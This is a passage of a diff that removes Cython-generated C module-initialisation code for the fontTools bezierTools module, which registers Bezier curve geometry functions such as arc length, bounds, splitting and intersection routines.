<<<<<<<<<<<<<< - * "approximateCubicArcLength", - * "approximateCubicArcLengthC", - */ - __pyx_t_2 = PyList_New(28); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 24, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - 
__Pyx_INCREF(__pyx_n_u_approximateCubicArcLength); - __Pyx_GIVEREF(__pyx_n_u_approximateCubicArcLength); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 0, __pyx_n_u_approximateCubicArcLength)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_approximateCubicArcLengthC); - __Pyx_GIVEREF(__pyx_n_u_approximateCubicArcLengthC); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 1, __pyx_n_u_approximateCubicArcLengthC)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_approximateQuadraticArcLength); - __Pyx_GIVEREF(__pyx_n_u_approximateQuadraticArcLength); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 2, __pyx_n_u_approximateQuadraticArcLength)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_approximateQuadraticArcLengthC); - __Pyx_GIVEREF(__pyx_n_u_approximateQuadraticArcLengthC); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 3, __pyx_n_u_approximateQuadraticArcLengthC)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_calcCubicArcLength); - __Pyx_GIVEREF(__pyx_n_u_calcCubicArcLength); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 4, __pyx_n_u_calcCubicArcLength)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_calcCubicArcLengthC); - __Pyx_GIVEREF(__pyx_n_u_calcCubicArcLengthC); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 5, __pyx_n_u_calcCubicArcLengthC)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_calcQuadraticArcLength); - __Pyx_GIVEREF(__pyx_n_u_calcQuadraticArcLength); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 6, __pyx_n_u_calcQuadraticArcLength)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_calcQuadraticArcLengthC); - __Pyx_GIVEREF(__pyx_n_u_calcQuadraticArcLengthC); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 7, __pyx_n_u_calcQuadraticArcLengthC)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_calcCubicBounds); - __Pyx_GIVEREF(__pyx_n_u_calcCubicBounds); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 8, __pyx_n_u_calcCubicBounds)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_calcQuadraticBounds); - 
__Pyx_GIVEREF(__pyx_n_u_calcQuadraticBounds); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 9, __pyx_n_u_calcQuadraticBounds)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_splitLine); - __Pyx_GIVEREF(__pyx_n_u_splitLine); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 10, __pyx_n_u_splitLine)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_splitQuadratic); - __Pyx_GIVEREF(__pyx_n_u_splitQuadratic); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 11, __pyx_n_u_splitQuadratic)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_splitCubic); - __Pyx_GIVEREF(__pyx_n_u_splitCubic); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 12, __pyx_n_u_splitCubic)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_splitQuadraticAtT_2); - __Pyx_GIVEREF(__pyx_n_u_splitQuadraticAtT_2); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 13, __pyx_n_u_splitQuadraticAtT_2)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_splitCubicAtT_2); - __Pyx_GIVEREF(__pyx_n_u_splitCubicAtT_2); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 14, __pyx_n_u_splitCubicAtT_2)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_splitCubicAtTC); - __Pyx_GIVEREF(__pyx_n_u_splitCubicAtTC); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 15, __pyx_n_u_splitCubicAtTC)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_splitCubicIntoTwoAtTC); - __Pyx_GIVEREF(__pyx_n_u_splitCubicIntoTwoAtTC); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 16, __pyx_n_u_splitCubicIntoTwoAtTC)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_solveQuadratic); - __Pyx_GIVEREF(__pyx_n_u_solveQuadratic); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 17, __pyx_n_u_solveQuadratic)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_solveCubic); - __Pyx_GIVEREF(__pyx_n_u_solveCubic); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 18, __pyx_n_u_solveCubic)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_quadraticPointAtT); - __Pyx_GIVEREF(__pyx_n_u_quadraticPointAtT); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 19, 
__pyx_n_u_quadraticPointAtT)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_cubicPointAtT); - __Pyx_GIVEREF(__pyx_n_u_cubicPointAtT); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 20, __pyx_n_u_cubicPointAtT)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_cubicPointAtTC); - __Pyx_GIVEREF(__pyx_n_u_cubicPointAtTC); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 21, __pyx_n_u_cubicPointAtTC)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_linePointAtT); - __Pyx_GIVEREF(__pyx_n_u_linePointAtT); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 22, __pyx_n_u_linePointAtT)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_segmentPointAtT); - __Pyx_GIVEREF(__pyx_n_u_segmentPointAtT); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 23, __pyx_n_u_segmentPointAtT)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_lineLineIntersections); - __Pyx_GIVEREF(__pyx_n_u_lineLineIntersections); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 24, __pyx_n_u_lineLineIntersections)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_curveLineIntersections); - __Pyx_GIVEREF(__pyx_n_u_curveLineIntersections); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 25, __pyx_n_u_curveLineIntersections)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_curveCurveIntersections); - __Pyx_GIVEREF(__pyx_n_u_curveCurveIntersections); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 26, __pyx_n_u_curveCurveIntersections)) __PYX_ERR(0, 24, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_u_segmentSegmentIntersections); - __Pyx_GIVEREF(__pyx_n_u_segmentSegmentIntersections); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 27, __pyx_n_u_segmentSegmentIntersections)) __PYX_ERR(0, 24, __pyx_L1_error); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_all, __pyx_t_2) < 0) __PYX_ERR(0, 24, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":56 - * - * - * def calcCubicArcLength(pt1, pt2, pt3, pt4, tolerance=0.005): # <<<<<<<<<<<<<< - * """Calculates the arc length for a cubic 
Bezier segment. - * - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_1calcCubicArcLength, 0, __pyx_n_s_calcCubicArcLength, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__13)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 56, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_2, __pyx_tuple__14); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_calcCubicArcLength, __pyx_t_2) < 0) __PYX_ERR(0, 56, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":75 - * - * - * def _split_cubic_into_two(p0, p1, p2, p3): # <<<<<<<<<<<<<< - * mid = (p0 + 3 * (p1 + p2) + p3) * 0.125 - * deriv3 = (p3 + p2 - p1 - p0) * 0.125 - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_3_split_cubic_into_two, 0, __pyx_n_s_split_cubic_into_two, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__16)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 75, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_split_cubic_into_two, __pyx_t_2) < 0) __PYX_ERR(0, 75, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":84 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * p0=cython.complex, - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_5_calcCubicArcLengthCRecurse, 0, __pyx_n_s_calcCubicArcLengthCRecurse, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__18)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 84, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_calcCubicArcLengthCRecurse, __pyx_t_2) < 0) __PYX_ERR(0, 84, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":115 - * mult=cython.double, - * ) - * def calcCubicArcLengthC(pt1, pt2, pt3, pt4, tolerance=0.005): # <<<<<<<<<<<<<< 
- * """Calculates the arc length for a cubic Bezier segment. - * - */ - __pyx_t_2 = PyFloat_FromDouble(((double)0.005)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 115, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - - /* "fontTools/misc/bezierTools.py":104 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - __pyx_t_3 = PyTuple_New(1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 104, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_2)) __PYX_ERR(0, 104, __pyx_L1_error); - __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_7calcCubicArcLengthC, 0, __pyx_n_s_calcCubicArcLengthC, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__20)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 104, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_2, __pyx_t_3); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - if (PyDict_SetItem(__pyx_d, __pyx_n_s_calcCubicArcLengthC, __pyx_t_2) < 0) __PYX_ERR(0, 104, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":129 - * - * - * epsilonDigits = 6 # <<<<<<<<<<<<<< - * epsilon = 1e-10 - * - */ - if (PyDict_SetItem(__pyx_d, __pyx_n_s_epsilonDigits, __pyx_int_6) < 0) __PYX_ERR(0, 129, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":130 - * - * epsilonDigits = 6 - * epsilon = 1e-10 # <<<<<<<<<<<<<< - * - * - */ - if (PyDict_SetItem(__pyx_d, __pyx_n_s_epsilon, __pyx_float_1eneg_10) < 0) __PYX_ERR(0, 130, __pyx_L1_error) - - /* "fontTools/misc/bezierTools.py":151 - * - * - * def calcQuadraticArcLength(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * """Calculates the arc length for a quadratic Bezier segment. 
- * - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_9calcQuadraticArcLength, 0, __pyx_n_s_calcQuadraticArcLength, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__22)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 151, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_calcQuadraticArcLength, __pyx_t_2) < 0) __PYX_ERR(0, 151, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":186 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_11calcQuadraticArcLengthC, 0, __pyx_n_s_calcQuadraticArcLengthC, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__24)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 186, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_calcQuadraticArcLengthC, __pyx_t_2) < 0) __PYX_ERR(0, 186, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":237 - * - * - * def approximateQuadraticArcLength(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * """Calculates the arc length for a quadratic Bezier segment. 
- * - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_13approximateQuadraticArcLength, 0, __pyx_n_s_approximateQuadraticArcLength, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__25)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 237, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_approximateQuadraticArcLength, __pyx_t_2) < 0) __PYX_ERR(0, 237, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":254 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_15approximateQuadraticArcLengthC, 0, __pyx_n_s_approximateQuadraticArcLengthC, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__27)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 254, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_approximateQuadraticArcLengthC, __pyx_t_2) < 0) __PYX_ERR(0, 254, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":298 - * - * - * def calcQuadraticBounds(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * """Calculates the bounding rectangle for a quadratic Bezier segment. - * - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_17calcQuadraticBounds, 0, __pyx_n_s_calcQuadraticBounds, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__29)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 298, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_calcQuadraticBounds, __pyx_t_2) < 0) __PYX_ERR(0, 298, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":332 - * - * - * def approximateCubicArcLength(pt1, pt2, pt3, pt4): # <<<<<<<<<<<<<< - * """Approximates the arc length for a cubic Bezier segment. 
- * - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_19approximateCubicArcLength, 0, __pyx_n_s_approximateCubicArcLength, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__31)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 332, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_approximateCubicArcLength, __pyx_t_2) < 0) __PYX_ERR(0, 332, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":362 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_21approximateCubicArcLengthC, 0, __pyx_n_s_approximateCubicArcLengthC, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__33)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 362, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_approximateCubicArcLengthC, __pyx_t_2) < 0) __PYX_ERR(0, 362, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":412 - * - * - * def calcCubicBounds(pt1, pt2, pt3, pt4): # <<<<<<<<<<<<<< - * """Calculates the bounding rectangle for a quadratic Bezier segment. - * - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_23calcCubicBounds, 0, __pyx_n_s_calcCubicBounds, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__35)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 412, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_calcCubicBounds, __pyx_t_2) < 0) __PYX_ERR(0, 412, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":450 - * - * - * def splitLine(pt1, pt2, where, isHorizontal): # <<<<<<<<<<<<<< - * """Split a line at a given coordinate. 
- * - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_25splitLine, 0, __pyx_n_s_splitLine, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__37)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 450, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_splitLine, __pyx_t_2) < 0) __PYX_ERR(0, 450, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":507 - * - * - * def splitQuadratic(pt1, pt2, pt3, where, isHorizontal): # <<<<<<<<<<<<<< - * """Split a quadratic Bezier curve at a given coordinate. - * - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_27splitQuadratic, 0, __pyx_n_s_splitQuadratic, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__39)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 507, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_splitQuadratic, __pyx_t_2) < 0) __PYX_ERR(0, 507, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":552 - * - * - * def splitCubic(pt1, pt2, pt3, pt4, where, isHorizontal): # <<<<<<<<<<<<<< - * """Split a cubic Bezier curve at a given coordinate. - * - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_29splitCubic, 0, __pyx_n_s_splitCubic, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__41)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 552, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_splitCubic, __pyx_t_2) < 0) __PYX_ERR(0, 552, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":589 - * - * - * def splitQuadraticAtT(pt1, pt2, pt3, *ts): # <<<<<<<<<<<<<< - * """Split a quadratic Bezier curve at one or more values of t. 
- * - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_31splitQuadraticAtT, 0, __pyx_n_s_splitQuadraticAtT_2, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__43)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 589, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_splitQuadraticAtT_2, __pyx_t_2) < 0) __PYX_ERR(0, 589, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":613 - * - * - * def splitCubicAtT(pt1, pt2, pt3, pt4, *ts): # <<<<<<<<<<<<<< - * """Split a cubic Bezier curve at one or more values of t. - * - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_33splitCubicAtT, 0, __pyx_n_s_splitCubicAtT_2, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__45)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 613, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_splitCubicAtT_2, __pyx_t_2) < 0) __PYX_ERR(0, 613, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":637 - * - * - * @cython.locals( # <<<<<<<<<<<<<< - * pt1=cython.complex, - * pt2=cython.complex, - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_35splitCubicAtTC, 0, __pyx_n_s_splitCubicAtTC, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj_)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 637, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_splitCubicAtTC, __pyx_t_2) < 0) __PYX_ERR(0, 637, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":661 - * - * - * @cython.returns(cython.complex) # <<<<<<<<<<<<<< - * @cython.locals( - * t=cython.double, - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_38splitCubicIntoTwoAtTC, 0, __pyx_n_s_splitCubicIntoTwoAtTC, NULL, 
__pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__47)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 661, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_splitCubicIntoTwoAtTC, __pyx_t_2) < 0) __PYX_ERR(0, 661, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":701 - * - * - * def _splitQuadraticAtT(a, b, c, *ts): # <<<<<<<<<<<<<< - * ts = list(ts) - * segments = [] - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_40_splitQuadraticAtT, 0, __pyx_n_s_splitQuadraticAtT, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__49)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 701, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_splitQuadraticAtT, __pyx_t_2) < 0) __PYX_ERR(0, 701, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":728 - * - * - * def _splitCubicAtT(a, b, c, d, *ts): # <<<<<<<<<<<<<< - * ts = list(ts) - * ts.insert(0, 0.0) - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_42_splitCubicAtT, 0, __pyx_n_s_splitCubicAtT, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__51)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 728, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_splitCubicAtT, __pyx_t_2) < 0) __PYX_ERR(0, 728, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":763 - * - * - * @cython.locals( # <<<<<<<<<<<<<< - * a=cython.complex, - * b=cython.complex, - */ - __pyx_t_2 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_44_splitCubicAtTC, 0, __pyx_n_s_splitCubicAtTC_2, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__3)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 763, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, 
__pyx_n_s_splitCubicAtTC_2, __pyx_t_2) < 0) __PYX_ERR(0, 763, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":805 - * # - * - * from math import sqrt, acos, cos, pi # <<<<<<<<<<<<<< - * - * - */ - __pyx_t_2 = PyList_New(4); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 805, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_n_s_sqrt); - __Pyx_GIVEREF(__pyx_n_s_sqrt); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 0, __pyx_n_s_sqrt)) __PYX_ERR(0, 805, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_s_acos); - __Pyx_GIVEREF(__pyx_n_s_acos); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 1, __pyx_n_s_acos)) __PYX_ERR(0, 805, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_s_cos); - __Pyx_GIVEREF(__pyx_n_s_cos); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 2, __pyx_n_s_cos)) __PYX_ERR(0, 805, __pyx_L1_error); - __Pyx_INCREF(__pyx_n_s_pi); - __Pyx_GIVEREF(__pyx_n_s_pi); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 3, __pyx_n_s_pi)) __PYX_ERR(0, 805, __pyx_L1_error); - __pyx_t_3 = __Pyx_Import(__pyx_n_s_math, __pyx_t_2, 0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 805, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_ImportFrom(__pyx_t_3, __pyx_n_s_sqrt); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 805, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, 